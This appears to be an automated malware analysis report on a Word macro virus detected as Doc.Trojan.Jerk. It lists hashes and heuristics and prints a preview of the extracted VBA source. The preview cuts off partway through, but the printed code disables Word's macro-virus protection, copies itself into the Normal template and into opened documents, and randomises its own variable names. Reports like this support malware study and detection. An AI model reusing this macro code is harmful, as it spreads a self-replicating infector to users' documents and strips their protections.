Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c694a06fc499869d…

MALICIOUS

Office (OLE)

41.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 62d3049011d559d0305eec96bda185df SHA-1: c2d7ce310d344379adef4c31bd516a8f3f690e1a SHA-256: c694a06fc499869d64b0521531b82c605eaae78abb6f239c16dec0a0214f2a1d
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with multiple signatures, indicating a known trojan. The presence of VBA macros, specifically the use of GetObject and the large macro source size, suggests an attempt to execute malicious code. The macro code appears to be obfuscated and truncated, but the overall structure points towards a downloader or dropper functionality, likely intended to deliver a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Jerk-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jerk-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30233 bytes
SHA-256: 17a9d52c23fca329d4a0349fc61b7dea0cafa697a594946d5d1c05937593d448
Detection
ClamAV: Doc.Trojan.Jerk-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

































Private Sub Document_Close()
On Error Resume Next
Const SFSSGK = True, KCAQJMOJJDRYHY = False, KJJXWAMOIUASANT = 0, KSCGZOGSQMYM = 1, XUGVOQRVYOYIXPC = wdFormatDocument, PYZYGN = wdFormatTemplate, QMWRMNE = ":"
Dim IYFCTHWLZBKHCVX, QZPOEJNWRCZWQK, TSBBZRVHYEGJZ, PAIRETTUYL As Boolean
Dim QDYQIGDMTNCRJGL, LOFGEOSILO As Object
Dim VKCFZKHOPULL, NANUCHZCFZ As String
If Day(Now) = 14 And Month(Now) > 5 Then MsgBox "I think " & Application.UserName & " is a big stupid jerk!", 0, "Class.Poppy"
Set QDYQIGDMTNCRJGL = ActiveDocument.VBProject.VBComponents.Item(KSCGZOGSQMYM)
Set LOFGEOSILO = NormalTemplate.VBProject.VBComponents.Item(KSCGZOGSQMYM)
Randomize
TSBBZRVHYEGJZ = KCAQJMOJJDRYHY
PAIRETTUYL = KCAQJMOJJDRYHY
If QDYQIGDMTNCRJGL.CodeModule.CountOfLines <> KJJXWAMOIUASANT Then TSBBZRVHYEGJZ = SFSSGK
If LOFGEOSILO.CodeModule.CountOfLines <> KJJXWAMOIUASANT Then PAIRETTUYL = SFSSGK
Options.VirusProtection = KCAQJMOJJDRYHY
If (TSBBZRVHYEGJZ = SFSSGK Xor PAIRETTUYL = SFSSGK) And (ActiveDocument.SaveFormat = XUGVOQRVYOYIXPC Or ActiveDocument.SaveFormat = PYZYGN) Then
If TSBBZRVHYEGJZ = SFSSGK Then
QZPOEJNWRCZWQK = NormalTemplate.Saved
NANUCHZCFZ = QDYQIGDMTNCRJGL.CodeModule.Lines(KSCGZOGSQMYM, QDYQIGDMTNCRJGL.CodeModule.CountOfLines)
Call RNKAIGOZLFWPJ(NANUCHZCFZ)
If Int(Rnd * 10 * KSCGZOGSQMYM) = KSCGZOGSQMYM * 7 Then Call KNGJXOZZSHM(NANUCHZCFZ)
Call KNIUGYJYGURSY(NANUCHZCFZ)
LOFGEOSILO.CodeModule.InsertLines KSCGZOGSQMYM, NANUCHZCFZ
If QZPOEJNWRCZWQK = SFSSGK Then NormalTemplate.Save
End If
VKCFZKHOPULL = Mid(ActiveDocument.FullName, 2, KSCGZOGSQMYM)
If PAIRETTUYL = SFSSGK And (VKCFZKHOPULL = QMWRMNE Or ActiveDocument.Saved = KCAQJMOJJDRYHY) Then
IYFCTHWLZBKHCVX = ActiveDocument.Saved
NANUCHZCFZ = LOFGEOSILO.CodeModule.Lines(KSCGZOGSQMYM, LOFGEOSILO.CodeModule.CountOfLines)
Call KNIUGYJYGURSY(NANUCHZCFZ)
QDYQIGDMTNCRJGL.CodeModule.InsertLines KSCGZOGSQMYM, NANUCHZCFZ
If IYFCTHWLZBKHCVX = SFSSGK Then ActiveDocument.Save
End If
End If
End Sub
Private Sub KNGJXOZZSHM(ByRef NANUCHZCFZ As String)
On Error Resume Next
Const ZIJVOF = 48, ZQCUFKOKTYX = 15, LYZXQTVTHQRPPNA = 5, MTTWUHZUGESQCCY = 65, QHCTJ = 90, KSCGZOGSQMYM = 1, SFSSGK = True, KCAQJMOJJDRYHY = False
Dim GMPCJXHAP, YDAMMTmp, WCDKOQDAC, YDAMM(KSCGZOGSQMYM To ZIJVOF), YDAMM2(KSCGZOGSQMYM To ZIJVOF) As String
Dim BLRXPBCZWINJ, EJXKD, IUKGXYNVW As Integer
Dim SLJRHVJ As Boolean
GMPCJXHAP = "NANUCHZCFZ ZIJVOF YDAMM YDAMM2 WCDKOQDAC BLRXPBCZWINJ EJXKD IUKGXYNVW SLJRHVJ KNGJXOZZSHM ZQCUFKOKTYX LYZXQTVTHQRPPNA MTTWUHZUGESQCCY QHCTJ KSCGZOGSQMYM GMPCJXHAP YDAMMTmp IYFCTHWLZBKHCVX QZPOEJNWRCZWQK TSBBZRVHYEGJZ PAIRETTUYL QDYQIGDMTNCRJGL LOFGEOSILO RNKAIGOZLFWPJ XQZONFLXNIZ UWDBOZBBTFDPYN XGZQH EQWRNZSRCXGI XQZONFLXNIZTmp TXFCLERDMBMXUH BNZVYEHGN VKCFZKHOPULL SFSSGK KCAQJMOJJDRYHY KJJXWAMOIUASANT XUGVOQRVYOYIXPC PYZYGN DCZWUW TIAIDQTFFKYTYPG QMWRMNE MVUQOOUIAA YBOVNV JWLRKMJNEKEVGM GLRKFIDJ KNIUGYJYGURSY AYQBIAYTMDCAQX SOHUZ LPXOGR"
Randomize
EJXKD = KSCGZOGSQMYM
For BLRXPBCZWINJ = KSCGZOGSQMYM To Len(GMPCJXHAP)
If Mid(GMPCJXHAP, BLRXPBCZWINJ, KSCGZOGSQMYM) = " " Or BLRXPBCZWINJ = Len(GMPCJXHAP) Then
If BLRXPBCZWINJ = Len(GMPCJXHAP) Then YDAMMTmp = YDAMMTmp & Mid(GMPCJXHAP, BLRXPBCZWINJ, KSCGZOGSQMYM)
For IUKGXYNVW = KSCGZOGSQMYM To Int((ZQCUFKOKTYX - LYZXQTVTHQRPPNA + KSCGZOGSQMYM) * Rnd + LYZXQTVTHQRPPNA)
YDAMM2(EJXKD) = YDAMM2(EJXKD) & Chr(Int((QHCTJ - MTTWUHZUGESQCCY + KSCGZOGSQMYM) * Rnd + MTTWUHZUGESQCCY))
Next IUKGXYNVW
YDAMM(EJXKD) = YDAMMTmp
YDAMMTmp = ""
EJXKD = EJXKD + KSCGZOGSQMYM
Else
YDAMMTmp = YDAMMTmp & Mid(GMPCJXHAP, BLRXPBCZWINJ, KSCGZOGSQMYM)
End If
Next BLRXPBCZWINJ
SLJRHVJ = KCAQJMOJJDRYHY
For BLRXPBCZWINJ = KSCGZOGSQMYM To Len(NANUCHZCFZ)
For EJXKD = KSCGZOGSQMYM To ZIJVOF
If Mid(NANUCHZCFZ, BLRX
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.